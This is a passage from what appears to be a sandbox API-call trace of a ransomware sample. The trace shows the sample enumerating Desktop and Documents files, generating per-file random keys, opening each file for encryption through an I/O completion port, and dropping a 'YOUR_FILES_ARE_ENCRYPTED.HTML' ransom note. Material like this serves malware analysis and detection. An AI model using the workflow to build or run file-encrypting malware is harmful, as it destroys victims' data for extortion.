ftLastAccessTime.dwHighDateTime=0x1d7e564, ftLastWriteTime.dwLowDateTime=0xc7d7d4e0, ftLastWriteTime.dwHighDateTime=0x1d7e564, nFileSizeHigh=0x0, nFileSizeLow=0xbd86, dwReserved0=0x0, dwReserved1=0x60, cFileName="xfwS5W2XuLkEZxGrlS1I.mkv", cAlternateFileName="XFWS5W~1.MKV")) returned 1 [0166.465] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\xfwS5W2XuLkEZxGrlS1I.mkv") returned 56 [0166.465] lstrcmpW (lpString1="xfwS5W2XuLkEZxGrlS1I.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.465] PathFindExtensionW (pszPath="xfwS5W2XuLkEZxGrlS1I.mkv") returned=".mkv" [0166.465] lstrlenW (lpString=".mkv") returned 4 [0166.465] PathFindExtensionW (pszPath="xfwS5W2XuLkEZxGrlS1I.mkv") returned=".mkv" [0166.465] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x244d35f0, ftCreationTime.dwHighDateTime=0x1d7e2ca, ftLastAccessTime.dwLowDateTime=0x1f11eda0, ftLastAccessTime.dwHighDateTime=0x1d7e4d3, ftLastWriteTime.dwLowDateTime=0x1f11eda0, ftLastWriteTime.dwHighDateTime=0x1d7e4d3, nFileSizeHigh=0x0, nFileSizeLow=0x16711, dwReserved0=0x0, dwReserved1=0x60, cFileName="ynEfaXS3MQ9Ek4.wav", cAlternateFileName="YNEFAX~1.WAV")) returned 1 [0166.465] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav") returned 50 [0166.465] lstrcmpW (lpString1="ynEfaXS3MQ9Ek4.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.465] PathFindExtensionW (pszPath="ynEfaXS3MQ9Ek4.wav") returned=".wav" [0166.465] lstrlenW (lpString=".wav") returned 4 [0166.465] PathFindExtensionW (pszPath="ynEfaXS3MQ9Ek4.wav") returned=".wav" [0166.465] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ynefaxs3mq9ek4.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.466] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=91921) returned 1 [0166.466] GetProcessHeap () returned 0x270000 [0166.466] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.467] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="20") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="03") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="0B") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="56") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="68") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="7E") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="20") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="F1") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="7E") returned 2 [0166.467] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="2B") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="73") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="BD") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="7D") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="6B") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="08") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="03") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="61") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="61") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="DD") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="1D") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="07") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="21") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="42") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="CB") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="1A") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="AF") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="B9") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="30") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="9B") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="E5") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="E1") returned 2 [0166.468] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="5A") returned 2 [0166.469] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ynEfaXS3MQ9Ek4.wav" [0166.469] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.469] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.474] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77800140, ftCreationTime.dwHighDateTime=0x1d7e1ca, ftLastAccessTime.dwLowDateTime=0xe0fba180, ftLastAccessTime.dwHighDateTime=0x1d7e731, ftLastWriteTime.dwLowDateTime=0xe0fba180, ftLastWriteTime.dwHighDateTime=0x1d7e731, nFileSizeHigh=0x0, nFileSizeLow=0x107b7, dwReserved0=0x0, dwReserved1=0x60, cFileName="YpHrE3CL0ZTRQROVql.ppt", cAlternateFileName="YPHRE3~1.PPT")) returned 1 [0166.474] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt") returned 54 [0166.474] lstrcmpW (lpString1="YpHrE3CL0ZTRQROVql.ppt", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0166.474] PathFindExtensionW (pszPath="YpHrE3CL0ZTRQROVql.ppt") returned=".ppt" [0166.474] lstrlenW (lpString=".ppt") returned 4 [0166.474] PathFindExtensionW (pszPath="YpHrE3CL0ZTRQROVql.ppt") returned=".ppt" [0166.474] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt" (normalized: "c:\\users\\5alr3u30d3\\desktop\\yphre3cl0ztrqrovql.ppt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.479] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=67511) returned 1 [0166.480] GetProcessHeap () returned 0x270000 [0166.480] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.480] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="F0") returned 2 [0166.480] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="D6") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="DF") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="2F") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="CE") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="A3") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="23") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="3E") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="00") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="71") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="9D") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="C8") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="47") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="26") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="67") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="C4") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="B7") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="19") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="AB") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="16") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="58") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="C4") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="96") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="EE") returned 2 [0166.481] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="C0") returned 2 [0166.482] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="41") returned 2 [0166.482] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="91") returned 2 [0166.482] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="48") returned 2 [0166.482] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="10") returned 2 [0166.482] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="3E") returned 2 [0166.482] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="FF") returned 2 [0166.482] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="19") returned 2 [0166.482] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\YpHrE3CL0ZTRQROVql.ppt" [0166.482] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.483] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.494] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b43d50, ftCreationTime.dwHighDateTime=0x1d7dd67, ftLastAccessTime.dwLowDateTime=0x474508e0, ftLastAccessTime.dwHighDateTime=0x1d7e2ba, ftLastWriteTime.dwLowDateTime=0x474508e0, ftLastWriteTime.dwHighDateTime=0x1d7e2ba, nFileSizeHigh=0x0, nFileSizeLow=0xa4fd, dwReserved0=0x0, dwReserved1=0x60, cFileName="yTVqJ0atNbrX.jpg", cAlternateFileName="YTVQJ0~1.JPG")) returned 1 [0166.494] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg") returned 48 [0166.494] lstrcmpW (lpString1="yTVqJ0atNbrX.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0166.494] PathFindExtensionW (pszPath="yTVqJ0atNbrX.jpg") returned=".jpg" [0166.494] lstrlenW (lpString=".jpg") returned 4 [0166.494] PathFindExtensionW (pszPath="yTVqJ0atNbrX.jpg") returned=".jpg" [0166.494] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ytvqj0atnbrx.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.496] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=42237) returned 1 [0166.496] GetProcessHeap () returned 0x270000 [0166.496] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.497] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="2E") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="6F") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="0E") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="47") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="6F") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="20") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="C1") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="FE") returned 2 [0166.497] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="BD") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="0F") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="5A") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="1E") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="18") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="58") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="9A") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="38") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="40") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="11") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="D7") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="98") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="47") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="92") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="1A") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="C8") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="6C") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="06") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="3C") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="7C") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="1E") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="16") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="BF") returned 2 [0166.498] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="09") returned 2 [0166.499] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\yTVqJ0atNbrX.jpg" [0166.499] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.499] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.511] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9acc97b0, ftCreationTime.dwHighDateTime=0x1d7e0b9, ftLastAccessTime.dwLowDateTime=0xd5c74a50, ftLastAccessTime.dwHighDateTime=0x1d7e12b, ftLastWriteTime.dwLowDateTime=0xd5c74a50, ftLastWriteTime.dwHighDateTime=0x1d7e12b, nFileSizeHigh=0x0, nFileSizeLow=0x375e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Zzdaqes0LOc.xls", cAlternateFileName="ZZDAQE~1.XLS")) returned 1 [0166.511] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls") returned 47 [0166.511] lstrcmpW (lpString1="Zzdaqes0LOc.xls", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0166.511] PathFindExtensionW (pszPath="Zzdaqes0LOc.xls") returned=".xls" [0166.511] lstrlenW (lpString=".xls") returned 4 [0166.511] PathFindExtensionW (pszPath="Zzdaqes0LOc.xls") returned=".xls" [0166.511] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls" (normalized: "c:\\users\\5alr3u30d3\\desktop\\zzdaqes0loc.xls"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.512] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=14174) returned 1 [0166.512] GetProcessHeap () returned 0x270000 [0166.512] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.513] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="12") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="85") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="35") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="49") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="0C") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="A1") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="9B") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="D8") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="D6") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="EF") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="73") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="93") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="AC") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="32") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="2A") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="47") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="53") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="51") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="72") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="94") returned 2 [0166.513] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="70") returned 2 [0166.514] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="26") returned 2 [0166.514] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="BF") returned 2 [0166.514] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="2E") returned 2 [0166.514] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="64") returned 2 [0166.514] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\Zzdaqes0LOc.xls" [0166.514] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.515] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.524] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9acc97b0, ftCreationTime.dwHighDateTime=0x1d7e0b9, ftLastAccessTime.dwLowDateTime=0xd5c74a50, ftLastAccessTime.dwHighDateTime=0x1d7e12b, ftLastWriteTime.dwLowDateTime=0xd5c74a50, ftLastWriteTime.dwHighDateTime=0x1d7e12b, nFileSizeHigh=0x0, nFileSizeLow=0x375e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Zzdaqes0LOc.xls", cAlternateFileName="ZZDAQE~1.XLS")) returned 0 [0166.524] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0166.524] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 61 [0166.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\desktop\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0166.525] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0166.527] CloseHandle (hObject=0x5a0) returned 1 [0166.527] GetProcessHeap () returned 0x270000 [0166.528] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0166.528] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaedb9520, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaedb9520, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0166.528] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents") returned 33 [0166.528] GetProcessHeap () returned 0x270000 [0166.528] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0166.528] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents" [0166.528] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\*" [0166.528] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaedb9520, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaedb9520, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0166.529] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaedb9520, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaedb9520, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0166.529] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, 